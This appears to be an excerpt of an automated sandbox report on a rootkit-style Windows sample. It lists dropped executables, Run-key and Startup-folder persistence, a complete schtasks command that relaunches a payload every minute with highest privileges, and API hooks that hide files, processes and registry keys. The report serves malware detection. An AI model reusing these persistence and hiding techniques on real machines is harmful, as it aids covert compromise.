Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadROOTkit.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadCodeRootKit.exe Jump to dropped file
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk Jump to behavior
Creates job files (autostart)
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\DeadROOTkit
Stores files to the Windows start menu directory
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkit Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkit Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Users\Public\DeadCodeRootKit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE Deadstager Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
